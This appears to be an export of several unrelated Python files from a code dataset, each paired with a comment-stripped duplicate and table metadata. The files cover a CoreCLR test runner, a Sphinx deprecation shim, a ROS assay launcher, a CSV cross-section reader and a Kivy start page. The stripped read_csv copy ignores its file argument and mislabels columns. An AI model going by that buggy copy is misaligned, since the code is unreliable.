coreclr_setup_args.runincontext_script_path = os.path.join(coreclr_setup_args.coreclr_tests_src_dir, "Common", "scripts", "runincontext%s" % (".cmd" if coreclr_setup_args.host_os == "windows" else ".sh"))
coreclr_setup_args.logs_dir = os.path.join(coreclr_setup_args.artifacts_location, "log")
return coreclr_setup_args
def precompile_core_root(args):
    """ Precompile every managed assembly in Core_Root using crossgen.

    Args:
        args : parsed arguments; uses test_location, core_root,
               crossgen_path, host_os, arch and crossgen_altjit.

    Notes:
        Assemblies matching a (platform-dependent) skip-list regex are
        never precompiled, and mscorlib is excluded up front.
    """
    skip_list = [
        ".*xunit.*",
        ".*api-ms-win-core.*",
        ".*api-ms-win.*",
        ".*System.Private.CoreLib.*"
    ]
    unix_skip_list = [
        ".*mscorlib.*",
        ".*System.Runtime.WindowsRuntime.*",
        ".*System.Runtime.WindowsRuntime.UI.Xaml.*",
        ".*R2RDump.dll.*"
    ]
    arm64_unix_skip_list = [
        ".*Microsoft.CodeAnalysis.VisualBasic.*",
        ".*System.Net.NameResolution.*",
        ".*System.Net.Sockets.*",
        ".*System.Net.Primitives.*"
    ]
    if args.host_os != "windows":
        skip_list += unix_skip_list
        if args.arch == "arm64":
            skip_list += arm64_unix_skip_list
    assert os.path.isdir(args.test_location)
    assert os.path.isdir(args.core_root)

    def call_crossgen(assembly_path, env):
        """Run crossgen on one assembly; return True on success."""
        assert os.path.isfile(args.crossgen_path)
        command = [args.crossgen_path, "/Platform_Assemblies_Paths", args.core_root, assembly_path]
        proc = subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE, env=env)
        proc.communicate()
        return_code = proc.returncode
        # crossgen reports this HRESULT for native (non-managed) images.
        if return_code == -2146230517:
            print("%s is not a managed assembly." % assembly_path)
            return False
        if return_code != 0:
            print("Unable to precompile %s (%d)" % (assembly_path, return_code))
            return False
        print("Successfully precompiled %s" % assembly_path)
        return True

    print("Precompiling all assemblies in %s" % args.core_root)
    print("")
    env = os.environ.copy()
    # Optional altjit configuration (fixed "not x is None" anti-idiom).
    if args.crossgen_altjit is not None:
        env["COMPlus_AltJit"] = "*"
        env["COMPlus_AltJitNgen"] = "*"
        env["COMPlus_AltJitName"] = args.crossgen_altjit
        env["COMPlus_AltJitAssertOnNYI"] = "1"
        env["COMPlus_NoGuiOnAssert"] = "1"
        env["COMPlus_ContinueOnAssert"] = "0"
    dlls = [os.path.join(args.core_root, item) for item in os.listdir(args.core_root) if item.endswith("dll") and "mscorlib" not in item]

    def in_skip_list(item):
        """True if the lower-cased path matches any skip regex."""
        for skip_re in skip_list:
            if re.match(skip_re, item.lower()) is not None:
                return True  # early exit instead of scanning the full list
        return False

    dlls = [dll for dll in dlls if not in_skip_list(dll)]
    for dll in dlls:
        call_crossgen(dll, env)
    print("")
# Version shim: pick a to_unicode() implementation at import time.
if sys.version_info.major < 3:
    def to_unicode(s):
        # Python 2: decode a byte string into a unicode object.
        return unicode(s, "utf-8")
else:
    def to_unicode(s):
        # Python 3: str is already unicode; return unchanged.
        return s
def find_test_from_name(host_os, test_location, test_name):
    """ Map an xunit test name back to its file under test_location.

    Test names encode the directory path with '_' replacing punctuation,
    so each '_'-separated token is matched greedily against directory
    entries (punctuation in entry names is normalized to '_' first).

    Args:
        host_os       (str): os name (unused in the body; kept for parity)
        test_location (str): root directory of the built tests
        test_name     (str): xunit test name (type + method)

    Returns:
        absolute path of the test file, or None if it could not be found
    """
    location = test_name
    # Accept either a file or a directory as an intermediate match.
    is_file_or_dir = lambda path : os.path.isdir(path) or os.path.isfile(path)
    def match_filename(test_path):
        # Resolve a '_'-mangled basename against the real directory entry,
        # using the module-level file_name_cache to avoid re-listing dirs.
        global file_name_cache
        if not os.path.isdir(os.path.dirname(test_path)):
            pass  # NOTE(review): dead no-op branch; the assert below still fires.
        assert os.path.isdir(os.path.dirname(test_path))
        size_of_largest_name_file = 0
        dir_contents = file_name_cache[os.path.dirname(test_path)]
        if dir_contents is None:
            # Cache miss: index this directory, keyed by mangled names.
            dir_contents = defaultdict(lambda: None)
            for item in os.listdir(os.path.dirname(test_path)):
                dir_contents[re.sub("[%s]" % string.punctuation, "_", item)] = item
            file_name_cache[os.path.dirname(test_path)] = dir_contents
        basename_to_match = re.sub("[%s]" % string.punctuation, "_", os.path.basename(test_path))
        if basename_to_match in dir_contents:
            # Replace the mangled basename with the on-disk spelling.
            test_path = os.path.join(os.path.dirname(test_path), dir_contents[basename_to_match])
        size_of_largest_name_file = len(max(dir_contents, key=len))
        return test_path, size_of_largest_name_file
    def dir_has_nested_substrings(test_path, test_item):
        # True if more than one directory entry contains test_item, which
        # means the greedy single-token match would be ambiguous.
        dir_contents = file_name_cache[os.path.dirname(test_path)]
        if dir_contents is None:
            dir_contents = defaultdict(lambda: None)
            for item in os.listdir(os.path.dirname(test_path)):
                dir_contents[re.sub("[%s]" % string.punctuation, "_", item)] = item
            file_name_cache[os.path.dirname(test_path)] = dir_contents
        test_item = re.sub("[%s]" % string.punctuation, "_", test_item)
        count = 0
        for item in dir_contents:
            if test_item in item:
                count += 1
        return count > 1
    starting_path = test_location
    loc_split = location.split("_")
    # append=True means the current token failed to match alone and is
    # glued (with '_') onto the next token before retrying.
    append = False
    for index, item in enumerate(loc_split):
        if not append:
            test_path = os.path.join(starting_path, item)
        else:
            append = False
            test_path, size_of_largest_name_file = match_filename(starting_path + "_" + item)
        if not is_file_or_dir(test_path):
            append = True
        elif index + 1 < len(loc_split) and os.path.isdir(test_path):
            # Look ahead: if the next token does not resolve inside this
            # directory (or the match is ambiguous), try treating the
            # remaining tokens as one '_'-joined file name instead.
            next_test_path = os.path.join(test_path, loc_split[index + 1])
            if not is_file_or_dir(next_test_path) or dir_has_nested_substrings(test_path, item):
                added_path = test_path
                for forward_index in range(index + 1, len(loc_split)):
                    added_path, size_of_largest_name_file = match_filename(added_path + "_" + loc_split[forward_index])
                    if is_file_or_dir(added_path):
                        append = True
                        break
                    elif size_of_largest_name_file < len(os.path.basename(added_path)):
                        # Candidate is already longer than any entry: give up.
                        break
        starting_path = test_path
    location = starting_path
    if not os.path.isfile(location):
        print("Warning: couldn't find test: %s" % test_name)
        return None
    assert(os.path.isfile(location))
    return location
def parse_test_results(args):
    """ Parse the xunit testRun.xml results file for a test run.

    Args:
        args: parsed arguments; uses logs_dir, host_os, arch, build_type
              and test_location.

    Returns:
        dict mapping test name -> per-test dict with keys name,
        test_path, failed, skipped, passed, time, test_output;
        or None when no results file could be found.
    """
    log_path = os.path.join(args.logs_dir, "TestRunResults_%s_%s_%s" % (args.host_os, args.arch, args.build_type))
    print("Parsing test results from (%s)" % log_path)
    test_run_location = os.path.join(args.logs_dir, "testRun.xml")
    if not os.path.isfile(test_run_location):
        # Check if this is a casing issue
        found = False
        for item in os.listdir(args.logs_dir):
            item_lower = item.lower()
            if item_lower == "testrun.xml":
                # Correct the name.
                os.rename(os.path.join(args.logs_dir, item), test_run_location)
                found = True
                break
        if not found:
            print("Unable to find testRun.xml. This normally means the tests did not run.")
            print("It could also mean there was a problem logging. Please run the tests again.")
            return
    print("Analyzing {}".format(test_run_location))
    assemblies = xml.etree.ElementTree.parse(test_run_location).getroot()
    tests = defaultdict(lambda: None)
    for assembly in assemblies:
        for collection in assembly:
            if collection.tag == "errors" and collection.text is not None:
                # Something went wrong during running the tests.
                print("Error running the tests, please run run.py again.")
                sys.exit(1)
            elif collection.tag != "errors":
                test_name = None
                for test in collection:
                    # Renamed locals: 'type' shadowed the builtin.
                    test_type = test.attrib["type"]
                    method = test.attrib["method"]
                    # Strip the nested-class suffix so the name maps to a path.
                    test_type = test_type.split("._")[0]
                    test_name = test_type + method
                assert test_name is not None
                failed = collection.attrib["failed"]
                skipped = collection.attrib["skipped"]
                passed = collection.attrib["passed"]
                elapsed = float(collection.attrib["time"])
                test_output = None
                if failed == "1":
                    # xunit nests the captured output under failure/message.
                    failure_info = collection[0][0]
                    test_output = failure_info.text
                test_location_on_filesystem = find_test_from_name(args.host_os, args.test_location, test_name)
                if test_location_on_filesystem is None:
                    continue
                assert os.path.isfile(test_location_on_filesystem)
                assert tests[test_name] is None
                tests[test_name] = defaultdict(lambda: None, {
                    "name": test_name,
                    "test_path": test_location_on_filesystem,
                    "failed": failed,
                    "skipped": skipped,
                    "passed": passed,
                    "time": elapsed,
                    "test_output": test_output
                })
    return tests
def print_summary(tests):
    """ Print a summary of a test run to stdout.

    Args:
        tests (dict): mapping of test name -> dict with keys name,
            test_path, failed, skipped, passed, time, test_output
            (as produced by parse_test_results).

    Splits tests into failed/passed/skipped buckets (sorted slowest
    first), prints each failing test with its captured output, then
    prints the overall counts.
    """
    assert tests is not None
    failed_tests = []
    passed_tests = []
    skipped_tests = []
    for test in tests:
        test = tests[test]
        if test["failed"] == "1":
            failed_tests.append(test)
        elif test["passed"] == "1":
            passed_tests.append(test)
        else:
            skipped_tests.append(test)
    # Slowest first, so expensive tests are easiest to spot.
    failed_tests.sort(key=lambda item: item["time"], reverse=True)
    passed_tests.sort(key=lambda item: item["time"], reverse=True)
    skipped_tests.sort(key=lambda item: item["time"], reverse=True)

    def print_tests_helper(tests, stop_count):
        """Print up to stop_count tests with a human-readable duration."""
        for index, item in enumerate(tests):
            time = item["time"]
            unit = "seconds"
            time_remainder = ""
            second_unit = ""
            saved_time = time
            remainder_str = ""
            # If it can be expressed in hours
            if time > 60**2:
                time = saved_time / (60**2)
                time_remainder = saved_time % (60**2)
                time_remainder /= 60
                time_remainder = math.floor(time_remainder)
                unit = "hours"
                second_unit = "minutes"
                remainder_str = " %s %s" % (int(time_remainder), second_unit)
            elif 60 < time < 60**2:
                time = saved_time / 60
                time_remainder = saved_time % 60
                time_remainder = math.floor(time_remainder)
                unit = "minutes"
                second_unit = "seconds"
                remainder_str = " %s %s" % (int(time_remainder), second_unit)
            print("%s (%d %s%s)" % (item["test_path"], time, unit, remainder_str))
            if stop_count is not None:
                if index >= stop_count:
                    break

    if len(failed_tests) > 0:
        print("%d failed tests:" % len(failed_tests))
        print("")
        print_tests_helper(failed_tests, None)
    # NOTE: listing the 50 slowest passing tests is intentionally disabled
    # here (too verbose for a normal run); re-enable behind a switch when
    # investigating test slowness.
    if len(failed_tests) > 0:
        print("")
        print("#################################################################")
        print("Output of failing tests:")
        print("")
        for item in failed_tests:
            print("[%s]: " % item["test_path"])
            print("")
            test_output = item["test_output"]
            # Replace CR/LF by just LF; Python "print", below, will map as
            # necessary on the platform. If we don't do this, then Python on
            # Windows will convert \r\n to \r\r\n on output.
            test_output = test_output.replace("\r\n", "\n")
            unicode_output = None
            if sys.version_info < (3, 0):
                try:
                    unicode_output = unicode(test_output, "utf-8")
                except Exception:  # narrowed from a bare except
                    print("Error: failed to convert Unicode output")
            else:
                unicode_output = test_output
            if unicode_output is not None:
                print(unicode_output)
            print("")
        print("")
        print("#################################################################")
        print("End of output of failing tests")
        print("#################################################################")
        print("")
    print("")
    print("Total tests run : %d" % len(tests))
    print("Total passing tests: %d" % len(passed_tests))
    print("Total failed tests : %d" % len(failed_tests))
    print("Total skipped tests: %d" % len(skipped_tests))
    print("")
def create_repro(args, env, tests):
    """ Write repro helper files for every failed test.

    Args:
        args : parsed arguments (uses artifacts_location, host_os, arch,
               build_type, plus whatever DebugEnv consumes).
        env  : environment dict passed through to DebugEnv.
        tests: dict produced by parse_test_results.

    The repro directory is recreated from scratch, so any previous repro
    files are deleted first.
    """
    assert tests is not None
    failed_tests = [tests[item] for item in tests if tests[item]["failed"] == "1"]
    if len(failed_tests) == 0:
        # Nothing failed: no repro files needed.
        return
    repro_location = os.path.join(args.artifacts_location, "repro", "%s.%s.%s" % (args.host_os, args.arch, args.build_type))
    if os.path.isdir(repro_location):
        shutil.rmtree(repro_location)
    print("")
    print("Creating repro files at: %s" % repro_location)
    os.makedirs(repro_location)
    assert os.path.isdir(repro_location)
    for test in failed_tests:
        # DebugEnv (defined elsewhere in this file) emits the per-test
        # repro script/launch configuration.
        debug_env = DebugEnv(args, env, test)
        debug_env.write_repro()
    print("Repro files written.")
| true | true |
f71034708fa8005df0436c0f212fae7a6821a4c0 | 1,015 | py | Python | sphinx/websupport/__init__.py | hason/sphinx | 5cd0f235a891de80b637c20e0d90fd916cc68a86 | [
"BSD-2-Clause"
] | null | null | null | sphinx/websupport/__init__.py | hason/sphinx | 5cd0f235a891de80b637c20e0d90fd916cc68a86 | [
"BSD-2-Clause"
] | null | null | null | sphinx/websupport/__init__.py | hason/sphinx | 5cd0f235a891de80b637c20e0d90fd916cc68a86 | [
"BSD-2-Clause"
] | null | null | null | # -*- coding: utf-8 -*-
"""
sphinx.websupport
~~~~~~~~~~~~~~~~~
Base Module for web support functions.
:copyright: Copyright 2007-2017 by the Sphinx team, see AUTHORS.
:license: BSD, see LICENSE for details.
"""
import warnings
from sphinx.deprecation import RemovedInSphinx20Warning
# Re-export the websupport API from its new home and warn about the move.
# Fixed typos in both user-facing messages ("webuspport" -> "websupport",
# "instaed" -> "instead").
try:
    from sphinxcontrib.websupport import WebSupport  # NOQA
    from sphinxcontrib.websupport import errors  # NOQA
    from sphinxcontrib.websupport.search import BaseSearch, SEARCH_ADAPTERS  # NOQA
    from sphinxcontrib.websupport.storage import StorageBackend  # NOQA

    warnings.warn('sphinx.websupport module is now provided as sphinxcontrib-websupport. '
                  'sphinx.websupport will be removed in Sphinx-2.0. Please use it instead',
                  RemovedInSphinx20Warning)
except ImportError:
    warnings.warn('Since Sphinx-1.6, sphinx.websupport module is now separated to '
                  'sphinxcontrib-websupport package. Please add it into your dependency list.')
import warnings
from sphinx.deprecation import RemovedInSphinx20Warning
try:
from sphinxcontrib.websupport import WebSupport
from sphinxcontrib.websupport import errors
from sphinxcontrib.websupport.search import BaseSearch, SEARCH_ADAPTERS
from sphinxcontrib.websupport.storage import StorageBackend
warnings.warn('sphinx.websupport module is now provided as sphinxcontrib-webuspport. '
'sphinx.websupport will be removed in Sphinx-2.0. Please use it instaed',
RemovedInSphinx20Warning)
except ImportError:
warnings.warn('Since Sphinx-1.6, sphinx.websupport module is now separated to '
'sphinxcontrib-webuspport package. Please add it into your dependency list.')
| true | true |
f71034b281252754f23f61cc8d343b1177404fdc | 5,670 | py | Python | faa_computer_admin/src/faa_computer_admin/control.py | njmei/fly-alcohol-assay | a3efc40e5ed5d48ed3a80e4b162e13736b0e04cc | [
"BSD-3-Clause"
] | null | null | null | faa_computer_admin/src/faa_computer_admin/control.py | njmei/fly-alcohol-assay | a3efc40e5ed5d48ed3a80e4b162e13736b0e04cc | [
"BSD-3-Clause"
] | null | null | null | faa_computer_admin/src/faa_computer_admin/control.py | njmei/fly-alcohol-assay | a3efc40e5ed5d48ed3a80e4b162e13736b0e04cc | [
"BSD-3-Clause"
] | null | null | null | #!/usr/bin/env python
from __future__ import print_function
import roslib
roslib.load_manifest('faa_computer_admin')
import rospy
import argparse
import subprocess
from faa_utilities import FindData
from faa_data_processing import TrackingDataProcessor
from faa_data_processing import VideoDataProcessor
from faa_data_processing import FigureDataProcessor
def process(path_list,overwrite,tracking,video,figure):
    """ Process experiment data found under a directory.

    Args:
        path_list (list): single-element list with the directory to search.
        overwrite (bool): reprocess data even if output already exists.
        tracking, video, figure (bool): which processors to run; if none
            is requested, all three run.  Figures are built from tracking
            results, so requesting figures implies tracking.
    """
    fd = FindData(overwrite)
    path = path_list[0]
    # Default: no specific processor requested -> run all three.
    if not tracking and not video and not figure:
        tracking = True
        video = True
        figure = True
    if figure and not tracking:
        tracking = True
    if tracking:
        contains_data = fd.path_contains_tracking_data(path)
        if not contains_data and overwrite:
            print("Path does not exist or does not contain tracking data.")
        elif not contains_data and not overwrite:
            print("Path does not exist, does not contain tracking data, or tracking data has already been processed.")
            print("Try -o overwrite switch to reprocess data.")
        # NOTE(review): processing still runs when contains_data is False;
        # presumably the processor no-ops on an empty search -- confirm.
        tdp = TrackingDataProcessor(overwrite)
        tdp.find_and_process_data(path)
    if video:
        contains_data = fd.path_contains_video_data(path)
        if not contains_data and overwrite:
            print("Path does not exist or does not contain video data.")
        elif not contains_data and not overwrite:
            print("Path does not exist, does not contain video data, or video data has already been processed.")
            print("Try -o overwrite switch to reprocess data.")
        vdp = VideoDataProcessor(overwrite)
        vdp.find_and_process_data(path)
    if figure:
        contains_data = fd.path_contains_figure_data(path)
        if not contains_data and overwrite:
            print("Path does not exist or does not contain figure data.")
        elif not contains_data and not overwrite:
            print("Path does not exist, does not contain figure data, or figure data has already been processed.")
            print("Try -o overwrite switch to reprocess data.")
        fdp = FigureDataProcessor(overwrite)
        fdp.find_and_process_data(path)
def calibrate():
    """
    Starts the camera calibration application
    (runs calibrate_camera.launch via roslaunch, no extra arguments).
    """
    _roslaunch('calibrate_camera.launch')
def experiment(no_usb_hardware):
    """Launch the experiment mode application via roslaunch.

    :param no_usb_hardware: when True, run in test mode with the
        'hardware' launch argument set to "false".
    """
    options = {}
    if no_usb_hardware:
        print("Running in test mode with no USB hardware attached.")
        options['hardware'] = "false"
    else:
        print("USB hardware attached!")
        options['hardware'] = "true"
    # Background-image reuse is currently hard-disabled.
    reuse_background_images = False
    if reuse_background_images:
        print("Reusing background images.")
        options['reusing_bg_images'] = "true"
    else:
        options['reusing_bg_images'] = "false"
    _roslaunch('experiment.launch', options)
def manual(no_usb_hardware):
    """Launch the manual control GUI via roslaunch.

    :param no_usb_hardware: when True, run in test mode with the
        'hardware' launch argument set to "false".
    """
    hardware_attached = not no_usb_hardware
    if hardware_attached:
        print("USB hardware attached!")
    else:
        print("Running in test mode with no USB hardware attached.")
    options = {'hardware': "true" if hardware_attached else "false"}
    _roslaunch('manual_control.launch', options)
def save_images():
    """
    Starts the save images application
    (runs save_images.launch with no extra roslaunch arguments).
    """
    options = {}
    _roslaunch('save_images.launch',options)
def _roslaunch(launch_file, options=None):
    """ Run a roslaunch file from the faa_launch package.

    Args:
        launch_file (str): name of the .launch file.
        options (dict): roslaunch arguments, appended as key:=value
            pairs.  Defaults to no arguments.  (Replaced the previous
            mutable default argument ``options={}``, a Python
            anti-pattern; the call remains backward compatible.)
    """
    if options is None:
        options = {}
    try:
        call_list = ['roslaunch', 'faa_launch', launch_file]
        for option in options:
            call_list.append(option + ":=" + str(options[option]))
        subprocess.call(call_list)
    except KeyboardInterrupt:
        # Allow Ctrl-C to stop the launched process cleanly.
        return
def cli():
    """ Command line entry point: parse arguments and dispatch to the
    requested mode (process data, calibrate, manual, or experiment).
    """
    parser = argparse.ArgumentParser(description='Fly Alcohol Assay Control')
    # parser.add_argument('-t','--test',action="store_true",
    #                     help='launch test.launch')
    parser.add_argument('-c','--calibrate',action="store_true",
                        help='launch calibrate_camera.launch')
    parser.add_argument('-e','--experiment',action="store_true", default=True,
                        help='launch experiment.launch')
    parser.add_argument('-n','--no-usb-hardware',action="store_true",
                        help='set testing mode when USB hardware is not attached')
    parser.add_argument('-p','--process',dest='process_path',nargs=1,default=False,
                        help='process data within directory')
    parser.add_argument('-o','--overwrite',action="store_true", default=False,
                        help='reprocess data and overwrite processed data files')
    parser.add_argument('-t','--tracking',action="store_true", default=False,
                        help='process tracking data')
    parser.add_argument('-v','--video',action="store_true", default=False,
                        help='process videos')
    parser.add_argument('-f','--figure',action="store_true", default=False,
                        help='process data figure')
    # parser.add_argument('-r','--reuse-background-images',action="store_true",
    #                     help='reuse background images when testing')
    parser.add_argument('-m','--manual',action="store_true",
                        help='launch manual control GUI')
    args = parser.parse_args()
    # Dispatch precedence: --process wins, then --calibrate, --manual,
    # and finally --experiment (whose default is True).
    if args.process_path:
        process(args.process_path,args.overwrite,args.tracking,args.video,args.figure)
    elif args.calibrate:
        calibrate()
    # elif args.save_images:
    #     save_images()
    elif args.manual:
        manual(args.no_usb_hardware)
    elif args.experiment:
        experiment(args.no_usb_hardware)
| 37.8 | 118 | 0.65097 |
from __future__ import print_function
import roslib
roslib.load_manifest('faa_computer_admin')
import rospy
import argparse
import subprocess
from faa_utilities import FindData
from faa_data_processing import TrackingDataProcessor
from faa_data_processing import VideoDataProcessor
from faa_data_processing import FigureDataProcessor
def process(path_list,overwrite,tracking,video,figure):
fd = FindData(overwrite)
path = path_list[0]
if not tracking and not video and not figure:
tracking = True
video = True
figure = True
if figure and not tracking:
tracking = True
if tracking:
contains_data = fd.path_contains_tracking_data(path)
if not contains_data and overwrite:
print("Path does not exist or does not contain tracking data.")
elif not contains_data and not overwrite:
print("Path does not exist, does not contain tracking data, or tracking data has already been processed.")
print("Try -o overwrite switch to reprocess data.")
tdp = TrackingDataProcessor(overwrite)
tdp.find_and_process_data(path)
if video:
contains_data = fd.path_contains_video_data(path)
if not contains_data and overwrite:
print("Path does not exist or does not contain video data.")
elif not contains_data and not overwrite:
print("Path does not exist, does not contain video data, or video data has already been processed.")
print("Try -o overwrite switch to reprocess data.")
vdp = VideoDataProcessor(overwrite)
vdp.find_and_process_data(path)
if figure:
contains_data = fd.path_contains_figure_data(path)
if not contains_data and overwrite:
print("Path does not exist or does not contain figure data.")
elif not contains_data and not overwrite:
print("Path does not exist, does not contain figure data, or figure data has already been processed.")
print("Try -o overwrite switch to reprocess data.")
fdp = FigureDataProcessor(overwrite)
fdp.find_and_process_data(path)
def calibrate():
_roslaunch('calibrate_camera.launch')
def experiment(no_usb_hardware):
if no_usb_hardware:
print("Running in test mode with no USB hardware attached.")
options = {'hardware': "false"}
else:
print("USB hardware attached!")
options = {'hardware': "true"}
reuse_background_images = False
if reuse_background_images:
print("Reusing background images.")
options['reusing_bg_images'] = "true"
else:
options['reusing_bg_images'] = "false"
_roslaunch('experiment.launch',options)
def manual(no_usb_hardware):
if no_usb_hardware:
print("Running in test mode with no USB hardware attached.")
options = {'hardware': "false"}
else:
print("USB hardware attached!")
options = {'hardware': "true"}
_roslaunch('manual_control.launch',options)
def save_images():
options = {}
_roslaunch('save_images.launch',options)
def _roslaunch(launch_file,options={}):
try:
call_list = ['roslaunch', 'faa_launch', launch_file]
for option in options:
call_list.append(option + ":=" + str(options[option]))
subprocess.call(call_list)
except KeyboardInterrupt:
return
def cli():
parser = argparse.ArgumentParser(description='Fly Alcohol Assay Control')
parser.add_argument('-c','--calibrate',action="store_true",
help='launch calibrate_camera.launch')
parser.add_argument('-e','--experiment',action="store_true", default=True,
help='launch experiment.launch')
parser.add_argument('-n','--no-usb-hardware',action="store_true",
help='set testing mode when USB hardware is not attached')
parser.add_argument('-p','--process',dest='process_path',nargs=1,default=False,
help='process data within directory')
parser.add_argument('-o','--overwrite',action="store_true", default=False,
help='reprocess data and overwrite processed data files')
parser.add_argument('-t','--tracking',action="store_true", default=False,
help='process tracking data')
parser.add_argument('-v','--video',action="store_true", default=False,
help='process videos')
parser.add_argument('-f','--figure',action="store_true", default=False,
help='process data figure')
parser.add_argument('-m','--manual',action="store_true",
help='launch manual control GUI')
args = parser.parse_args()
if args.process_path:
process(args.process_path,args.overwrite,args.tracking,args.video,args.figure)
elif args.calibrate:
calibrate()
elif args.manual:
manual(args.no_usb_hardware)
elif args.experiment:
experiment(args.no_usb_hardware)
| true | true |
f7103744258570afc23a22f07e345f4e747dd4cc | 245 | py | Python | DDGraphs/__init__.py | lancelotimb/dd-graphs | ff6f6f2efcdf9e3784c465c8977b41543654b4f0 | [
"MIT"
] | null | null | null | DDGraphs/__init__.py | lancelotimb/dd-graphs | ff6f6f2efcdf9e3784c465c8977b41543654b4f0 | [
"MIT"
] | null | null | null | DDGraphs/__init__.py | lancelotimb/dd-graphs | ff6f6f2efcdf9e3784c465c8977b41543654b4f0 | [
"MIT"
] | null | null | null | from .init import init
from .draw_timeseries_graph import draw_timeseries_graph
from .draw_pie_charts import draw_pie_chart
from .draw_top_list import draw_top_list
__all__ = ["init", "draw_timeseries_graph", "draw_pie_chart", "draw_top_list"]
| 35 | 78 | 0.832653 | from .init import init
from .draw_timeseries_graph import draw_timeseries_graph
from .draw_pie_charts import draw_pie_chart
from .draw_top_list import draw_top_list
__all__ = ["init", "draw_timeseries_graph", "draw_pie_chart", "draw_top_list"]
| true | true |
f710381da3f755d00f1686fe84e2e0bb0f62b4dc | 1,215 | py | Python | pyIsoDep/tests/read_csv.py | MattKrecicki/PYTHON-ISOTOPIC-DEPLETION-PACKAGE | ccad214de8721aa9b499ef70cd39966f18bceb76 | [
"MIT"
] | 1 | 2022-01-04T22:21:18.000Z | 2022-01-04T22:21:18.000Z | pyIsoDep/tests/read_csv.py | DanKotlyar/PYTHON-ISOTOPIC-DEPLETION-PACKAGE | d9da8be6eff4ba301f9689ce5c38a5e50856d033 | [
"MIT"
] | null | null | null | pyIsoDep/tests/read_csv.py | DanKotlyar/PYTHON-ISOTOPIC-DEPLETION-PACKAGE | d9da8be6eff4ba301f9689ce5c38a5e50856d033 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""read_csv
Read the different csv files
Created on Mon Oct 11 21:30:00 2021 @author: Dan Kotlyar
Last updated on Mon Oct 11 21:45:00 2021 @author: Dan Kotlyar
"""
import numpy as np
import pandas as pd
def ReadCsv(csvFile):
    """ Read isotope cross-section data from a csv file.

    Args:
        csvFile (str): path to a csv file with columns 'ZAID', 'MT',
            'XS [barns]' and 'N0 [atoms/b-cm]'.

    Returns:
        xsTable (ndarray): one row per unique isotope with columns
            0-ID, 1-N0, 2-capture (MT=102), 3-fission (MT=18),
            4-(n,alpha) (MT=107).
        idxFields (dict): column index of each field in xsTable.

    Notes:
        Fixes two defects of the original implementation: the csvFile
        argument was ignored ('bootstrap.csv' was hard-coded), and
        idxFields mislabeled columns 3/4 (sig_f and sig_alpha were
        swapped relative to the MT fill order and the column comment).
    """
    data = pd.read_csv(csvFile)
    ID = np.array(data['ZAID'], dtype=int)
    xsTypes = np.array(data['MT'], dtype=int)
    xsVals = np.array(data["XS [barns]"], dtype=float)
    N0 = np.array(data["N0 [atoms/b-cm]"], dtype=float)
    fullID = np.unique(ID)  # unique isotopes
    nIsotopes = len(fullID)
    # columns: 0-ID, 1-N0, 2-capture, 3-fission, 4-(n,alpha)
    xsTable = np.zeros((nIsotopes, 5))
    xsTable[:, 0] = fullID
    # ENDF MT reaction numbers: 102=capture, 18=fission, 107=(n,alpha)
    numMTs = np.array([102, 18, 107])
    for idx, numMT in enumerate(numMTs):
        _, idxFull, idx0 =\
            np.intersect1d(fullID, ID[xsTypes == numMT], assume_unique=False,
                           return_indices=True)
        if idx == 0:
            # Take the number densities from the capture (MT=102) rows.
            xsTable[idxFull, 1] = N0[xsTypes == numMT][idx0]
        xsTable[idxFull, idx+2] = xsVals[xsTypes == numMT][idx0]
    idxFields = {"ID": 0, "N0": 1, "sig_c": 2, "sig_f": 3, "sig_alpha": 4}
    return xsTable, idxFields
| 28.255814 | 77 | 0.604115 |
import numpy as np
import pandas as pd
def ReadCsv(csvFile):
data = pd.read_csv('bootstrap.csv')
ID = np.array(data['ZAID'], dtype=int)
xsTypes = np.array(data['MT'], dtype=int)
xsVals = np.array(data["XS [barns]"], dtype=float)
N0 = np.array(data["N0 [atoms/b-cm]"], dtype=float)
fullID = np.unique(ID)
nIsotopes = len(fullID)
xsTable = np.zeros((nIsotopes, 5))
xsTable[:, 0] = fullID
numMTs = np.array([102, 18, 107])
for idx, numMT in enumerate(numMTs):
vals, idxFull, idx0 =\
np.intersect1d(fullID, ID[xsTypes == numMT], assume_unique=False,
return_indices=True)
if idx == 0:
xsTable[idxFull, 1] = N0[xsTypes == numMT][idx0]
xsTable[idxFull, idx+2] = xsVals[xsTypes == numMT][idx0]
idxFields = {"ID": 0, "N0": 1, "sig_c": 2, "sig_alpha": 3, "sig_f": 4}
return xsTable, idxFields
| true | true |
f710383da7cf5e7b2bacdc981bb14cc2aeedc558 | 6,434 | py | Python | components/start_page.py | SrGambiarra/KivyStudioDesigner | 7f617b60aef3d5e99865cb559b9b5ee93a1988f5 | [
"MIT"
] | 3 | 2022-03-05T21:54:34.000Z | 2022-03-15T12:55:45.000Z | components/start_page.py | SrGambiarra/KivyStudioDesigner | 7f617b60aef3d5e99865cb559b9b5ee93a1988f5 | [
"MIT"
] | 2 | 2022-03-13T04:15:47.000Z | 2022-03-30T11:51:41.000Z | components/start_page.py | SrGambiarra/KivyStudioDesigner | 7f617b60aef3d5e99865cb559b9b5ee93a1988f5 | [
"MIT"
] | null | null | null | __all__ = [
'DesignerLinkLabel', 'RecentItem',
'RecentFilesBox' 'DesignerStartPage']
from utils.utils import get_designer, get_fs_encoding
from kivy.properties import ObjectProperty, StringProperty
from kivy.uix.scrollview import ScrollView
from kivy.uix.boxlayout import BoxLayout
from kivy.lang.builder import Builder
from kivy.uix.button import Button
import webbrowser
Builder.load_string("""
#: import theme_atlas utils.utils.theme_atlas
<DesignerButtonFit@DesignerButton>
size_hint_x: None
width: (self.texture_size[0]+sp(32))
<DesignerStartPage>:
btn_open: btn_open
btn_new: btn_new
recent_files_box: recent_files_box
orientation: 'vertical'
padding: (0, 0, 0, dp(20))
Label:
text: 'Kivy Designer'
font_size: '26pt'
size_hint_y: None
height: '40pt'
Label:
markup: True
text: '[i]Innovative User Interfaces, Desktop, and Mobile Development Made Easy.[/i]'
font_size: pt(12)
halign: 'center'
size_hint_y: None
height: '15pt'
GridLayout:
cols: 2
size_hint: None, None
height: self.minimum_height
width: self.minimum_width
pos_hint: {'center_x': 0.5}
padding: (0, pt(15), 0, 0)
spacing: '4sp'
DesignerButtonFit:
id: btn_open
text: 'Open Project'
on_release: root.dispatch('on_open_down')
DesignerButtonFit:
id: btn_new
text: 'New Project'
on_release: root.dispatch('on_new_down')
Label:
text: 'Getting Started'
font_size: '16pt'
bold: True
size_hint_y: None
height: '30pt'
GridLayout:
kivy_label: kivy_label
cols: 2
size_hint: None, None
height: self.minimum_height
width: '450dp'
pos_hint: {'center_x': 0.5}
